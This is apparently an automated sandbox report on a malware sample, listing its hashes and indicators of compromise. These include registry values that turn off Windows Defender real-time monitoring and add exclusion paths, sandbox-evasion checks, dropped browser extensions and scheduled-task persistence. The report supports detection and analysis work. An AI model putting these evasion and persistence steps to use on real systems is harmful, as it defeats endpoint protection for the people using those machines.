Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
189s -
max time network
192s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
30/06/2023, 22:38
Static task
static1
Behavioral task
behavioral1
Sample
5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe
Resource
win7-20230621-en
General
-
Target
5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe
-
Size
7.1MB
-
MD5
3d12defeb118889eee18dd015406e84d
-
SHA1
0e5c54d54eb2f964b493839f0ca2136253b8effa
-
SHA256
5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5
-
SHA512
d0c2d4088430782163fca845d70390af32dfc0a72d694753a9b743adb69b19d20a2dfc96f9d45c02778d6503179b8fbeeae18f4e3638be25f2479b4b819f906f
-
SSDEEP
196608:91OBCpw0ZAljaWc5kWi2sJUSxtqiMlsvrKN1aCHaenvj:3OBAceH22y5xtqiM6Buvj
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pNRMKCwFqwdxSFZt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xTRsizlJSGUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\CTJjJnZaTLQnbGVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WASabAiYZoPU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KJXFElJjZabuIxmUcOR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WASabAiYZoPU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\CTJjJnZaTLQnbGVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gPtoEFCUU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\xTRsizlJSGUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pNRMKCwFqwdxSFZt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths Process not Found Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KJXFElJjZabuIxmUcOR = "0" Process not Found Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gVmmTejSMDqsC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pNRMKCwFqwdxSFZt = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gPtoEFCUU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\gVmmTejSMDqsC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\pNRMKCwFqwdxSFZt = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 1996 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3297628651-743815474-1126733160-1000\Control Panel\International\Geo\Nation tMUvFJo.exe -
Executes dropped EXE 4 IoCs
pid Process 1276 Install.exe 692 Install.exe 1656 FCTyizT.exe 852 tMUvFJo.exe -
Loads dropped DLL 12 IoCs
pid Process 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 1276 Install.exe 1276 Install.exe 1276 Install.exe 1276 Install.exe 692 Install.exe 692 Install.exe 692 Install.exe 1996 rundll32.exe 1996 rundll32.exe 1996 rundll32.exe 1996 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json tMUvFJo.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json tMUvFJo.exe -
Drops file in System32 directory 21 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol FCTyizT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_0000B55B07F557912D5F544EE3812859 tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_FC5D5D6049B16E7D2E12046A21F4E610 tMUvFJo.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA tMUvFJo.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini FCTyizT.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_0000B55B07F557912D5F544EE3812859 tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_FC5D5D6049B16E7D2E12046A21F4E610 tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA tMUvFJo.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_B7F77CA30FDEE9C9F40235DCDC85DF26 tMUvFJo.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol FCTyizT.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA tMUvFJo.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_B7F77CA30FDEE9C9F40235DCDC85DF26 tMUvFJo.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\GSFECHF.xml tMUvFJo.exe File created C:\Program Files (x86)\gVmmTejSMDqsC\iNVrxCE.dll tMUvFJo.exe File created C:\Program Files (x86)\xTRsizlJSGUn\nVRmjji.dll tMUvFJo.exe File created C:\Program Files (x86)\gPtoEFCUU\hrjfUv.dll tMUvFJo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi tMUvFJo.exe File created C:\Program Files (x86)\WASabAiYZoPU2\GhhrZjCfgUivl.dll tMUvFJo.exe File created C:\Program Files (x86)\WASabAiYZoPU2\XvpffDl.xml tMUvFJo.exe File created C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\rhyoKNp.dll tMUvFJo.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi tMUvFJo.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak tMUvFJo.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja tMUvFJo.exe File created C:\Program Files (x86)\gPtoEFCUU\DmoaxjT.xml tMUvFJo.exe File created C:\Program Files (x86)\gVmmTejSMDqsC\yBLVjmE.xml tMUvFJo.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bjVqJkGFAiNaUEAvEn.job schtasks.exe File created C:\Windows\Tasks\MZObKWyefxVnmbFER.job schtasks.exe File created C:\Windows\Tasks\VHLBDothpetOaQE.job schtasks.exe File created C:\Windows\Tasks\teabCtqLwEhjalrvZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 13 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1328 schtasks.exe 1148 schtasks.exe 1772 schtasks.exe 1972 schtasks.exe 948 schtasks.exe 1168 schtasks.exe 1352 schtasks.exe 1372 schtasks.exe 1644 schtasks.exe 588 schtasks.exe 1792 schtasks.exe 900 schtasks.exe 1008 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs tMUvFJo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs tMUvFJo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-2b-42-d7-b8-7e tMUvFJo.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00d7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{538A0981-535A-4674-A2D5-27FEB93E2AFA}\WpadNetworkName = "Network 3" tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" tMUvFJo.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00d7000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 tMUvFJo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{538A0981-535A-4674-A2D5-27FEB93E2AFA}\WpadDecisionReason = "1" tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs tMUvFJo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{538A0981-535A-4674-A2D5-27FEB93E2AFA}\de-2b-42-d7-b8-7e rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-2b-42-d7-b8-7e\WpadDecision = "0" rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix tMUvFJo.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-2b-42-d7-b8-7e\WpadDecisionTime = d05532faa3abd901 tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs tMUvFJo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" tMUvFJo.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs tMUvFJo.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-2b-42-d7-b8-7e\WpadDecisionTime = d05532faa3abd901 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings tMUvFJo.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-2b-42-d7-b8-7e\WpadDecisionReason = "1" tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust tMUvFJo.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{538A0981-535A-4674-A2D5-27FEB93E2AFA}\WpadDecisionTime = d05532faa3abd901 tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs tMUvFJo.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\de-2b-42-d7-b8-7e\WpadDetectedUrl rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad tMUvFJo.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{538A0981-535A-4674-A2D5-27FEB93E2AFA}\de-2b-42-d7-b8-7e tMUvFJo.exe -
Suspicious behavior: EnumeratesProcesses 44 IoCs
pid Process 1548 powershell.EXE 1548 powershell.EXE 1548 powershell.EXE 1232 powershell.EXE 1232 powershell.EXE 1232 powershell.EXE 1496 powershell.EXE 1496 powershell.EXE 1496 powershell.EXE 1376 powershell.EXE 1376 powershell.EXE 1376 powershell.EXE 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe 852 tMUvFJo.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1548 powershell.EXE Token: SeDebugPrivilege 1232 powershell.EXE Token: SeDebugPrivilege 1496 powershell.EXE Token: SeDebugPrivilege 1376 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 2036 wrote to memory of 1276 2036 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 28 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 1276 wrote to memory of 692 1276 Install.exe 29 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1756 692 Install.exe 31 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 692 wrote to memory of 1148 692 Install.exe 33 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1756 wrote to memory of 1544 1756 forfiles.exe 35 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1148 wrote to memory of 532 1148 forfiles.exe 36 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 1544 wrote to memory of 1984 1544 cmd.exe 38 PID 532 wrote to memory of 772 532 cmd.exe 37 PID 532 wrote to memory of 772 532 cmd.exe 